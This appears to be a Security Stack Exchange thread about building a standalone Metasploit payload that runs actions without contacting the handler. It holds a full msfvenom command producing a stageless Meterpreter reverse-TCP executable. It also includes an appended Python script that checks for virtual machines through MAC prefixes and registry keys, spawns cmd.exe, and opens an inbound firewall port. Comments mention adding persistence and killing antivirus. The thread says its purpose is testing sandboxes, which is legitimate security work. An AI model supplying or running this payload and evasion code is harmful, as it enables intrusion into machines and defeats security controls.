
I know how to create payloads using Metasploit and then script an AutoRun script, so when the victim machine connects back to my Kali server it executes some actions. Works sweet!

What I wanted to do is create a payload weaponized with actions (Create process, change firewall rules, check VM, etc...) so I can run actions without the need to connect back to my Kali host.

Do you know if this is possible with Metasploit or Meterpreter? In case it isn't possible, is there any app I can use to create standalone payloads?

This is for a POC and the intention is to test effectiveness of some sandboxing solutions.

schroeder
Frosa
  • With a quick Google search, I found "autoruncommands.rc" – schroeder Feb 08 '15 at 22:18
  • Tried this... these autoruncommands are what I'm using at the moment. They're executed only after the target machine contacts the Meterpreter server. – Frosa Feb 08 '15 at 23:55

2 Answers


I am not sure how much you are familiar with the Meterpreter ecosystem but if you have some experience, this should be easy to achieve through the python bindings in the stageless meterpreter.

The stageless meterpreter has an attribute called EXTINIT which can be set to any arbitrary Python script, and the session will execute the commands even before the handler is contacted. For this to work, it is important that the python extension is loaded. Both of these tasks can be achieved through:

msfvenom -p windows/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> EXTENSIONS=stdapi,priv,python EXTINIT=python,/root/met.py -f exe -o met-stageless.exe

As can be seen, EXTENSIONS is set to load python, which bakes it into the generated EXE, while EXTINIT will initialise the python extension (by default only stdapi is loaded) and run the commands specified in the /root/met.py file. If you can code an action in Python (pretty much anything), you can run it through the python extension.

void_in
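What the /root/met.py script referenced in the msfvenom command above could look like, as an added example for this thread (it is not code from the answer or from the Metasploit project). It covers the actions the question lists: a VM check, creating a process, and changing a firewall rule. Assumptions are labelled in the code: the python extension runs the file as `__main__` in an embedded Python 2.7 (so the code stays 2/3 compatible), the log-file location, the spawned command, and the rule name and port 4444 are all choices made for this POC, and the Windows-only steps are skipped on other platforms so the pure functions can be exercised anywhere. Because results are appended to a local log, nothing has to connect back to a handler for the tester to see what ran.

```python
# met.py: actions executed by the Meterpreter python extension at start-up
# (passed via EXTINIT=python,/root/met.py). Added example for this thread,
# not code from the Metasploit project. Assumes the extension runs the file
# as __main__ and that the embedded interpreter may be Python 2.7, so the
# code stays 2/3 compatible. Results go to a local log file, so no handler
# is needed to see what happened.
import os
import subprocess
import sys
import uuid

# Well-known hypervisor OUIs (first three bytes of the MAC address).
VM_MAC_PREFIXES = {
    "00:0C:29": "VMware", "00:50:56": "VMware", "00:05:69": "VMware",
    "08:00:27": "VirtualBox",
    "00:15:5D": "Hyper-V",
    "00:16:3E": "Xen",
    "52:54:00": "QEMU/KVM",
    "00:1C:42": "Parallels",
}

# Registry keys that only exist under common hypervisors (Windows only).
VM_REGISTRY_KEYS = [
    r"SOFTWARE\VMware, Inc.\VMware Tools",
    r"SOFTWARE\Oracle\VirtualBox Guest Additions",
    r"SOFTWARE\Microsoft\Virtual Machine\Guest\Parameters",
]

# Log location is an assumption for the POC (falls back to the working dir).
LOG_PATH = os.path.join(os.environ.get("TEMP", "."), "met-actions.log")


def oui_of(node):
    """Return the OUI of a 48-bit MAC address (as an int) as 'AA:BB:CC'."""
    top = (node >> 24) & 0xFFFFFF
    return "%02X:%02X:%02X" % (top >> 16, (top >> 8) & 0xFF, top & 0xFF)


def vm_hint_from_mac(node):
    """Name of the hypervisor whose OUI matches the MAC, or None."""
    return VM_MAC_PREFIXES.get(oui_of(node))


def vm_hints_from_registry():
    """Hypervisor-specific registry keys that exist; empty list off Windows."""
    try:
        import winreg                  # Python 3
    except ImportError:
        try:
            import _winreg as winreg   # Python 2.7 (what the extension embeds)
        except ImportError:
            return []
    found = []
    for key in VM_REGISTRY_KEYS:
        try:
            winreg.CloseKey(winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, key))
            found.append(key)
        except OSError:
            pass
    return found


def build_firewall_cmd(rule_name, port):
    """netsh argument vector that allows an inbound TCP port through the Windows firewall."""
    return ["netsh", "advfirewall", "firewall", "add", "rule",
            "name=%s" % rule_name, "dir=in", "action=allow",
            "protocol=TCP", "localport=%d" % int(port)]


def run_actions(log_path=None, apply_changes=None):
    """Run the VM checks, spawn a process and add a firewall rule; return the log lines.

    apply_changes defaults to True only on Windows; log_path=None skips the file write.
    """
    if apply_changes is None:
        apply_changes = sys.platform == "win32"
    lines = []
    lines.append("vm_mac_hint=%s" % vm_hint_from_mac(uuid.getnode()))
    lines.append("vm_registry_hints=%s" % ",".join(vm_hints_from_registry()))
    if apply_changes:
        # Create process: a benign child that a sandbox should record (assumed command).
        proc = subprocess.Popen(["cmd.exe", "/c", "whoami"], stdout=subprocess.PIPE)
        out, _ = proc.communicate()
        lines.append("spawned cmd.exe, whoami=%s" % out.decode("utf-8", "replace").strip())
        # Change firewall rules: rule name and port are assumptions for the POC.
        rc = subprocess.call(build_firewall_cmd("POC-inbound", 4444))
        lines.append("netsh rc=%d" % rc)
    else:
        lines.append("skipped process/firewall actions (not Windows)")
    if log_path:
        with open(log_path, "a") as fh:
            fh.write("\n".join(lines) + "\n")
    return lines


if __name__ == "__main__":   # assumption: the extension runs the script as __main__
    run_actions(LOG_PATH)
```

The checks are split into small pure functions (`oui_of`, `vm_hint_from_mac`, `build_firewall_cmd`) so they can be unit-tested on the Kali side before the binary is built; only `run_actions` touches the host, and it records what it did so the sandbox run can be compared against the log afterwards.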

Have no real experience, but how 'bout this from the Metasploit docs:

  • Staged Stager: payloads work in conjunction with stage payloads in order to perform a specific task. A stager establishes a communication channel between the attacker and the victim and reads in a stage payload to execute on the remote host.

But I can't figure out if you need to be connected to the victim or not. It either executes the payloads in given order based on how the previous stage executed locally, or the decision is made on your machine - and therefore you have to be connected.

user1164108
  • Yes, you need to. What I want to do is pack the stager with post-exploitation modules (e.g. persistence, process migration, AV detection, AV kill, etc.). – Frosa Feb 08 '15 at 23:57
  • Does anyone know a good framework to write custom exploits that doesn't necessarily need to contact a server to execute functions? – Frosa Feb 09 '15 at 19:23